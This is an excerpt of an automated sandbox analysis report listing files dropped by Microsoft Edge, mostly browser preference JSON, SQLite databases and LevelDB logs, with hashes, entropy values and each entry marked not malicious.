                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                    MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                    SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                    SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                    SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2206573698964425
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:PjOq2P923oH+TcwtzjqEKj0QMxIFUt8sGZZmw+sF7kwO923oH+TcwtzjqEKj0QMT:PKv4YebvqBZFUt8sGZ/+s95LYebvqBaJ
                                                                                                                                                                                                                                                                                    MD5:F8684610B383B7A1D8422571D1144686
                                                                                                                                                                                                                                                                                    SHA1:C48DD327742A41C76BA304D977AB9D4C33BB8ABB
                                                                                                                                                                                                                                                                                    SHA-256:CDFD3153999FAFB7AA55867354A6F788DF8C4DF4DCA386874F29E5495B1000B7
                                                                                                                                                                                                                                                                                    SHA-512:D2BC7DB2CE41FA94E0E2A4DC5D7ADFC3ABB7789BE2375F02BE1CCA4773BA61026EBF2617D92E04CEAD4D8A417024908A3C2E71486231428418CA221180BA9378
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:58:06.533 1a10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/23-00:58:06.534 1a10 Recovering log #3.2024/12/23-00:58:06.537 1a10 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):325
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.227297576861632
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERrIq2P923oH+TcwtpIFUt8VRrZZmw+VRq97kwO923oH+Tcwta/WLJ:Zv4YebmFUt8R/+W75LYebaUJ
                                                                                                                                                                                                                                                                                    MD5:C1AEFBDD7EAF54327E977CBF80E771C3
                                                                                                                                                                                                                                                                                    SHA1:A68F26B82FC115356435973578880425C56E47DF
                                                                                                                                                                                                                                                                                    SHA-256:047ABB6A934DF1363F436B4A91EB8781E3CF4EA2587BCFB11E34BA83DA239AC9
                                                                                                                                                                                                                                                                                    SHA-512:B5C42DEC054BD859E260DC4EB52FDF19E753F98D5060A731A24BDE6850838B783DB5AA5076DB864E2C0117711D5B0AF95E08F343406A099039CF06128A71AA4C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.795 660 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/23-00:57:47.795 660 Recovering log #3.2024/12/23-00:57:47.796 660 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2654811564768635
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMzSAELyKOMq+8yC8F/YfU5m+OlTLVum8:Bq+n0Jz9ELyKOMq+8y9/OwL
                                                                                                                                                                                                                                                                                    MD5:1012BC5ECA2D716479A2AD45476A6484
                                                                                                                                                                                                                                                                                    SHA1:8B892CAFB4DBD4C076E58944C83C35DABD77963C
                                                                                                                                                                                                                                                                                    SHA-256:6FEA184AC5ED232C6A0470A50C085E2FFED4F7ACEDF2D3A6D7B35CE8615BAB26
                                                                                                                                                                                                                                                                                    SHA-512:56A05CCAF4370BDF0B0D78CF07F1478646F3C98D2ACA0B0BCB19F599F2E8CC7CCDB867D9B95F4DC374A88F80C680DCA40FDC80D40154E6535FD2D5DCC18DB06F
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4670794694983289
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0IV:v7doKsKuKZKlZNmu46yjx0G
                                                                                                                                                                                                                                                                                    MD5:31374BB7D10A46215EB86EC38E0FFC67
                                                                                                                                                                                                                                                                                    SHA1:A0535E52248CEA61DDBA611E03A075AC44E2DB35
                                                                                                                                                                                                                                                                                    SHA-256:EDE3B5DF9BAC7E06597B91D25B1BCE2046CC2204B765283510201BA47CA75004
                                                                                                                                                                                                                                                                                    SHA-512:93D17BAC2BC3DFC3918FCA2110FB3A0955A5506B3B32A2C1C9E2E71F4CBF6BC2B262EFB8014E8C1A23A9545176400A970BB6D882C5431C207D8ACFAF9208742B
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17676), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17676
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.484352974260808
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:stxPGKSu4lsuwfh+xwFHybGvQwm6WflaTYw:sjOxuowfmvbG45xaTYw
                                                                                                                                                                                                                                                                                    MD5:8B362533A91E7AF4DFEF8A41D129ADCE
                                                                                                                                                                                                                                                                                    SHA1:856FAC2DFC581F83702FAE6C41319FE84586E1FB
                                                                                                                                                                                                                                                                                    SHA-256:06CB796870B4D87C71858C3A0FCCCDB8C21FA0411A2F3BACD062822CD9C138D1
                                                                                                                                                                                                                                                                                    SHA-512:77D5EE0B1C9247C862DACFE238ED2F2CED5F4172849F75E2D264C5627DAE01CD8FE595A21040A3E76E21C9975EC80F7A47B4580D475B38FAE5487ED6E2F23C6E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.10194027286935615
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:+k38k3T5spEjVl/PnnnnnnnnnnnvoQ/Eou:+k38k3TaoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                    MD5:EB9EEE2D2CD7EC1300D8DF3F5FA68994
                                                                                                                                                                                                                                                                                    SHA1:AB57342CCA9BB967428DECF20CB1B7F321633239
                                                                                                                                                                                                                                                                                    SHA-256:D017A75B760CD054C74A15A99E1F252F3C3F16B9C907A966D87691047B944E1F
                                                                                                                                                                                                                                                                                    SHA-512:E739D52D5D591E22FD881406778842A5E5A2578985D307003535041C8DDE9789F0A6A08EFB0BC549A1F20BBA14CE30115116EDC496B0252DA400EEF554AB5421
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):317272
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8870037984674718
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:G2ayFinyiEyRRyMtyLK5AykS6yDyEAy4inyhMcyx1I1Vyfvv82yYyIlyoy6vyCx6:/ak
                                                                                                                                                                                                                                                                                    MD5:B4A9DB98F2CE02ACF1B89D1C8AE4404D
                                                                                                                                                                                                                                                                                    SHA1:8C73D039FC56D87330997FD2532FB301493C6B4F
                                                                                                                                                                                                                                                                                    SHA-256:377149819D8A48D00CF2E2D96130F215913F4F911FFADCDC818168E126E3A226
                                                                                                                                                                                                                                                                                    SHA-512:6AE498264EED37F3CB3EE2E1C681DB63CC01E02F15791BCF52822997B9BF03429811FB30EB4B0F5F3C80A77E9FC5847909FA201355FD295FE51F75B170AE6445
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):628
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.236695485697315
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:/XntM+iTl3sedhOKOuuuuuuuuuuuuuuuuuuuuuuu2PsedhOg:Wlc8NOuuuuuuuuuuuuuuuuuuuuuuuL8d
                                                                                                                                                                                                                                                                                    MD5:1B1EA4B81595C4CF0E00BD56BBF8C756
                                                                                                                                                                                                                                                                                    SHA1:FF31AD3C47DC66AD9345789E73BBA315A65A00B0
                                                                                                                                                                                                                                                                                    SHA-256:AAA0B94F9599F5EC35AE83187E33D5FC26A3531AF02459E6AA0E1A1925A9568F
                                                                                                                                                                                                                                                                                    SHA-512:497E206492CDC57B39F0D5BF1B69726A584CD024571BE2AC75FB35A7FC04EDC85A67E27DAF59B7E3F5D52881100D3AD7D638A402C47849376DD8762A5CBC1F14
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195018070104971
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdPuVoyq2P923oH+TcwtfrK+IFUt8VRdJD1Zmw+VRdJVRkwO923oH+TcwtfrUed:MVyv4Yeb23FUt85/+FR5LYeb3J
                                                                                                                                                                                                                                                                                    MD5:BE4BA172462AA1DDCD83453084364C78
                                                                                                                                                                                                                                                                                    SHA1:E51DCAA34697CB5F83C1CA70C345E76B496CB5F7
                                                                                                                                                                                                                                                                                    SHA-256:F9ABA4B2E6548F73AAE103A63CDE31343CC963AA3BFEB7F105B2539AF22A8489
                                                                                                                                                                                                                                                                                    SHA-512:B6858F8897363FF21FC971D3499A2DA91F82F797A90789558017E01483E67CA3054A3683EC17262BCF77BB2C2E1EFF63F74C379338047174D63AA2F363EC2840
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.583 10a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-00:57:48.585 10a0 Recovering log #3.2024/12/23-00:57:48.585 10a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                    MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                    SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                    SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                    SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.160286870229116
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdKVoyq2P923oH+TcwtfrzAdIFUt8VRdQ1Zmw+VRdGRkwO923oH+TcwtfrzILJ:5iyv4Yeb9FUt8o/+oR5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:EA2E065A6EFD34282DCB653EA57CFEE2
                                                                                                                                                                                                                                                                                    SHA1:5679D460AAB002F37848297EE4E5524C6D110022
                                                                                                                                                                                                                                                                                    SHA-256:7BB6EB930A247F77DE564A9C87CA30A8AAA3D6568745743FAF65235CCD357329
                                                                                                                                                                                                                                                                                    SHA-512:DE2E7868377E8E566BBCDBE9051B653A4EE5FDE8B3F90013F5F048F6A8ACE26D71CFC31938EFB0316466237EC724C7AF04134E7BC69C846EA08734A435626003
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:48.442 10a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-00:57:48.443 10a0 Recovering log #3.2024/12/23-00:57:48.443 10a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
